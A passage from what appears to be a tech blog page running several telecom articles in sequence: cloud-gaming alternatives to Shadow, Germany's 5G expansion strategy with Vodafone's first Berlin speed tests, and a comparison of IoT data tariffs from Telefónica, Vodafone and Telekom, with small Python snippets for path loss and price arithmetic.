In the same vein, it is unclear how Shadow intends to act against violations of its code of conduct. The use of the remote PC for crypto mining or illegal activities, for example, is prohibited. However, since the company refrains from monitoring its users, it says it will only inspect user data on justified suspicion. How easily the company would bend to external pressure cannot be judged until such a case arises.

Alternative: Geforce Now

As an alternative to Shadow, there is GeForce Now (see our review). It is currently in beta and offers a platform with preinstalled games. However, installing "unknown" games is cumbersome, since so far only Steam, Uplay, the Blizzard app and the Epic Games Launcher are supported; among the big digital platforms, EA's Origin, the Microsoft Store and GOG are missing. According to Nvidia, GeForce Now supports around 400 games.

Alternative: Liquid Sky

LiquidSky (see our review) follows the same principle as Shadow. At the moment the project is still in a beta phase, with activation by recommendation. The current offer has two performance levels: Power Serve and High Performance. Depending on your choice, your virtual machine gets a 3- or 6-core processor and 2 or 4 GB of video memory, and credits are deducted from your virtual balance accordingly: one hour in gamer mode costs 60 credits (around 50 cents), and pro mode costs twice as much at 120 credits (about 1 euro).

How Operators Should Expedite 5G Deployment


The major challenge in the 5G rollout is building entirely new infrastructure and rapidly increasing the number of base stations. One way to speed up 5G deployment is for mobile operators to collaborate to the point where infrastructure can be shared.

A second fix for slow 5G readiness is changing the process of acquiring infrastructure sites, for which the responsible ministry or authority of the country can be approached.

Here is a 5G Rapid Deployment Case Study:

Germany's Ministry of Transport developed a new strategy for mobile communications: faster approval processes, public land as sites for mobile masts, and cooperation between providers. The Federal Ministry of Transport under Andreas Scheuer, which is also responsible for digital affairs and infrastructure, promoted mobile communications with an overall strategy.

Federal Infrastructure Minister Andreas Scheuer (CSU) promoted the expansion of mobile communications in poorly served rural areas with further measures. As part of a new overall strategy, regulations for faster approval and expansion processes were introduced, the ministry announced, and public plots of land were to be provided as sites for transmitters.

Cooperation between suppliers on expansion, and acceptance among local residents, were to be strengthened. The package was being developed at the time and went to a vote in the federal government.

The focus was on eliminating the remaining white spots, the ministry said; the strategy went beyond the providers' previous requirements and commitments. Specifically, it was planned, among other things, to improve the mobile network on trains, for which 50 million euros in funding had been earmarked since autumn. In border regions, network operators would be able to activate additional LTE stations or push existing ones to their maximum performance.

Some 17,000 federal government properties, 5,000 plots owned by security agencies and 120,000 parcels of the waterways and shipping administration were identified as possible transmitter sites - some as early as June 2019. There, network operators were to be offered shorter approval procedures than elsewhere, and favorable rental conditions.

Despite all investments, there were still areas with poor mobile and internet coverage, especially rural ones. The recent auction of frequencies for the new 5G standard enshrined further requirements to make some white spots disappear, including that by the end of 2022 at least 98 percent of households in Germany must be supplied with at least 100 Mbit/s in the download.

Vodafone took that opportunity and was able to expedite its 5G tests, achieving better results than expected.

Vodafone Shows High Data Rates in the First 5G Mobile Station

In a first test of Vodafone's network in Berlin, the city's first public 5G network measured 840 megabits per second in the download and almost 36 megabits in the upload. The newly auctioned frequencies have not yet been assigned.


Vodafone has switched on the new 5G network at a first location in Berlin-Adlershof. As the network operator announced on 15 August 2019, two more Berlin 5G stations are to follow shortly. Vodafone has also activated its first stations in Frankfurt, Solingen, Duisburg and Bremen. All in all, 40 stations are now broadcasting in what is so far Germany's only public 5G mobile network; ten more will follow later this month.

The base station in Berlin is said to be from Huawei, as Golem.de has learned from informed circles; Ericsson equips North Rhine-Westphalia and the west. But the newly auctioned 5G spectrum is not yet assigned. "We are using existing frequencies in the 3.5 GHz band that we already acquired in the past, and once the new frequencies are allocated we will be able to further optimize the performance of the 5G network," Vodafone spokesman Tobias Krzossa told Golem.de on request.

Customers have no access to Deutsche Telekom's first 5G network in Berlin; special SIM cards are needed there, which may be issued only to Telekom employees.

The Huawei Mate 20 X 5G has been available to Vodafone customers on the 5G network since its launch in July. Similarly, the Gigacube 5G is already serving its first customers as a replacement for slow landline connections. Soon Vodafone customers will be able to surf the 5G network with a second smartphone: the Samsung Galaxy S10 5G is receiving the required software update and will then also work on 5G. Vodafone claims "a few thousand users" on the 5G tariffs it has offered for nearly four weeks.

Speedtest is promising

The daily newspaper Welt tested the network with a Huawei Mate 20 X 5G. In a parking lot with a clear view of the antenna at a distance of just under 300 meters, 840 megabits per second were measured in the download and almost 36 megabits in the upload. In a speed test in a McDonald's restaurant in Adlershof, about 500 meters from the antenna, editor Thomas Heuzeroth reached 280 Mbit/s; outside the door it was 400 Mbit/s. "You should not go much beyond 1,000 meters, because then it is no longer enough," Heuzeroth explained.

In Berlin-Adlershof, the Welt tester likely had almost the entire capacity of the radio cell - a shared medium - to himself.
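The falling data rates with distance fit basic propagation physics: even in ideal free space, path loss grows by 6 dB for every doubling of distance. A rough sketch for the 3.5 GHz band used here (idealized free-space model only; real urban attenuation from buildings and foliage is higher):

```python
import math

FREQ_HZ = 3.5e9  # the 3.5 GHz band Vodafone is using for 5G here

def fspl_db(distance_m, freq_hz=FREQ_HZ):
    """Free-space path loss in dB: 20*log10(d) + 20*log10(f) - 147.55."""
    return 20 * math.log10(distance_m) + 20 * math.log10(freq_hz) - 147.55

# The three distances from the Welt speed test.
for d in (300, 500, 1000):
    print(d, round(fspl_db(d), 1))  # 300 92.9 / 500 97.3 / 1000 103.3
```

Roughly 10 dB more loss at 1,000 m than at 300 m means a far weaker signal, consistent with the tester's advice not to stray much beyond a kilometer.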

Business Internet Of Things | IoT Applications 2019


Bringing things onto the internet is not an easy job, and the heavy resource utilization puts pressure on mobile tariffs for the IoT.

Via mobile radio, smart devices reach the Internet of Things most easily. Mobile network providers have offers for companies as well as for private customers.


Dog trackers, company cars, surveillance cameras in the garden or on remote company premises: if machines of any size are to communicate with each other or with central computers, network access is required. Especially for mobile devices, or where no internet connection is nearby, wireless solutions via mobile radio come into play. Outdoor air-quality stations, too, often use cellular access to send their measurements to the evaluation server.

Case Study: European Mobile Operators Offering IoT Services

The European mobile network operators Telefónica, Vodafone and Deutsche Telekom offer pure data access for this purpose - including a special feature: while national roaming is still being discussed for the coming 5G mobile radio standard, free network choice has been a reality for machine connections for years.

National Roaming For The IoT

All three European network operators make national roaming possible with a little trick: they use SIM cards from their foreign subsidiaries. For example, Telefónica uses a SIM card called Vivo-o2-Movistar with a Spanish ID for roaming at home and globally. Vodafone did not tell us the country of origin of its SIMs, but wrote: "IoT applications can access other networks worldwide in the event that no Vodafone network is available, enabled by a dedicated global SIM card that is licensed and used exclusively for the Internet of Things."

It works similarly for Telekom's business IoT rates. The cards here are called GlobalSIM and come with an international identifier. "In addition, there are dedicated roaming agreements for this card with the other mobile service providers in Germany," writes the press office.

The pure data rates for IoT use are available to both private and business users, and the providers orient them toward the application. Deutsche Telekom, for example, sees trackers of all kinds as the field of application for its private-customer SIMs. Similarly Vodafone: its residential product V-Sim usually ships inside tracking systems for dogs, cats, children or cars, and Vodafone also lists mobile surveillance cameras as a use case. Only O2/Telefónica offers its pure data plan for private customers without an explicit deployment scenario, leaving the use to the customer.

Private IoT: Tracking, Watching, Driving

From the kind of use, some providers also seem to derive their prices - such as Vodafone with the V-Sim. The network operator offers it individually and as a bundle of hardware and SIM card; depending on the application and hardware, the packages are called V-Kids Watch, V-Camera, V-Pet Tracker or V-Auto. The private customer pays a one-time price for the hardware plus a monthly service fee of between just under three and six euros, depending on package and service. The pure V-Sim without bundled hardware and services costs around five euros, plus just under seven euros monthly. Vodafone promises that the monthly fee covers all data traffic across the EU.

At Telefónica/O2, private customers can use the o2 Go free ticket. Although the prepaid data tariff has no basic charge, customers must book traffic separately. This can be done on a daily basis: for almost three euros there are 500 MB per day. Whoever chooses the ten-day option for just under 20 euros saves a third and can consume ten times 500 MB. Monthly options start with the Surf Pack S at 300 MB for just under three euros; the XL pack with 10 GB of traffic costs just under 35 euros.
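The "saves a third" claim can be checked in a few lines, taking the article's "just under" prices at face value:

```python
# O2's illustrative prepaid options from the text (the article's rounded prices).
daily_eur, daily_mb = 3.0, 500
ten_day_eur, ten_day_mb = 20.0, 10 * 500

price_per_gb_daily = daily_eur / (daily_mb / 1000)        # 6.0 EUR/GB
price_per_gb_ten_day = ten_day_eur / (ten_day_mb / 1000)  # 4.0 EUR/GB

saving = 1 - price_per_gb_ten_day / price_per_gb_daily
print(f"{saving:.0%}")  # "33%" -> the "saves a third" from the text
```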

Telekom does not have one dedicated tariff for all IoT applications; besides its pure data rates, it offers further specialized products. As Car Connect, the Group markets an IoT tariff for vehicles: via an adapter plug, not only is telematics data transmitted to the cloud, the plug also serves as a hotspot for up to five connected devices such as smartphones or tablets. These share the included data volume of 5 GB for new customers, or 10 GB if the tariff is added to an existing contract. The adapter regularly costs just under forty euros but is currently offered for one euro. If you want to track something other than your car, you can choose Smart Connect S. The tariff, called a tracking flat, costs about five euros and includes unlimited data volume at a download bandwidth of only 64 kbit/s; in the upload, there are only 0.064 kbit/s.

For business users the picture is completely different: here, all three network providers offer great freedom and tailor their offers to the customer's wishes.


Business IoT: Not So Easy

Telefónica Deutschland offers its customers a tariff model designed especially for IoT applications. IoT Connect is used to connect machines and devices and to provide easy access to the Internet of Things and M2M applications. The tariff consists of a modular service catalog with two basic rates and numerous bookable additional services; the basic tariffs differ according to whether the primary use is in Germany or in Europe.

In a kind of kit, customers can choose between short and long terms, flexible data packages and other options. Particularly interesting: the data packages booked per SIM can be combined into a common pool, so differing traffic needs can balance each other out. At the end of the very clear IoT tariff construction kit, Telefónica displays both the total price and the price per SIM. For managing the booked SIMs there is a dedicated platform called Kite, which lets customers manage their devices and eases integration with the IoT cloud.
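The pooling idea can be pictured with a small sketch; the SIM names and volumes are invented for illustration, and this is not Telefónica's actual Kite API:

```python
# Hypothetical pooled-data accounting across IoT SIMs (illustrative values).
booked_mb = {"sim-forklift": 100, "sim-gateway": 500, "sim-sensor": 10}
used_mb   = {"sim-forklift": 180, "sim-gateway": 250, "sim-sensor": 5}

pool_total = sum(booked_mb.values())  # 610 MB available to all SIMs together
pool_used = sum(used_mb.values())     # 435 MB consumed across the fleet

# The forklift SIM alone exceeded its own booking (180 > 100 MB), but the
# shared pool absorbs it - exactly the compensation the tariff allows.
print(pool_used <= pool_total)  # True
```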

In contrast to Telefónica, Telekom and Vodafone are rather cautious about specific offers and prices. On request, Vodafone describes its tracking system Vodafone IoT Tracker for vehicles, from cars to trucks, construction machinery and other moving objects. Part of it is an interface where the customer can follow the tracked objects. Business customers can book the platform from just under four euros per month per tracked object; the scope and cost of the networking depend on the customer's needs and wishes. For all other applications, such as machine control, remote monitoring or automation, companies can contact the network operator directly.

The same is true of Telekom, which points to the complexity of IoT applications. It starts with the question of whether the planned application will be used internally or sold as a product; further aspects of a tailor-made IoT tariff are billing modalities, device activation, distribution and more. When asked, the press office says: "It's just not done with data tariffs alone - as a telecoms company, we have a self-service platform that allows our customers to meet all these different needs."

Deutsche Telekom refers to its supply structure, which allows different tariffs depending on the business model. Nevertheless, starting in June of this year, a prepaid system will be sold as a simply bookable standard offer. In addition, the Group offers complete packages for selected uses such as goods tracking and machine monitoring.

Alternative: Multi-SIM and additional cards

For both private and business users, a look at the terms and conditions of their mobile and fixed-line contracts can pay off. Many contracts allow booking additional SIM cards that use the contract's inclusive services under the same number as the main card. This way you can bring your tablet or smartwatch online, as well as IoT devices. The available data volume of the contract is usually shared by all cards. But beware: the conditions for multi-SIMs differ greatly between mobile operators and between individual contracts.

Another way to bring trackers and other things online is via the additional SIM cards some fixed-line providers offer with their connections. At 1&1, for example, some DSL connections include up to four free SIM cards, throttled to 7.2 Mbit/s of bandwidth and up to 100 MB of data per month. Only an activation fee applies to these cards, and their term is tied to that of the main contract.

Oldschool: IoT control and feedback via SMS

Admittedly, SIM cards in all sorts of electronics are nothing new. Car heaters, for example, have long been controllable remotely, usually via SMS. According to Telekom, demand for this old technique is no longer strong, which is why SMS is no longer provided for its IoT applications. Nevertheless, according to the press office, the company's SIM cards are multimode-capable and, in addition to the NB-IoT radio standard, can always fall back to 2G/3G, which would still allow SMS.

Telefónica continues to see SMS as sometimes necessary, even for IoT applications; accordingly, all of the Group's IoT systems support SMS, and the global SIM Vivo-o2-Movistar allows both reception and transmission. Vodafone is different: both the V-Sim for residential customers and the Vodafone IoT Tracker for enterprise customers are purely IP-based data systems in which circuit-switched services such as sending and receiving SMS are not provided.

A look at IoT tariffs for both private and business customers shows that the Internet of Things is already a reality. With the expansion of 5G, network operators expect a strong increase in networked devices. Telekom, for example, speaks of massive IoT and points out that today's networks are technologically and economically ill-prepared for the onrush of machines. That is why the company and its competitors are working hard to prepare future networks and the services they will need.

The IoT network models deployed by these three mobile operators are case studies in industrial-scale deployment of the Internet of Things.

As everything moves onto the internet, businesses need IoT ideas and plans of their own to seize these opportunities.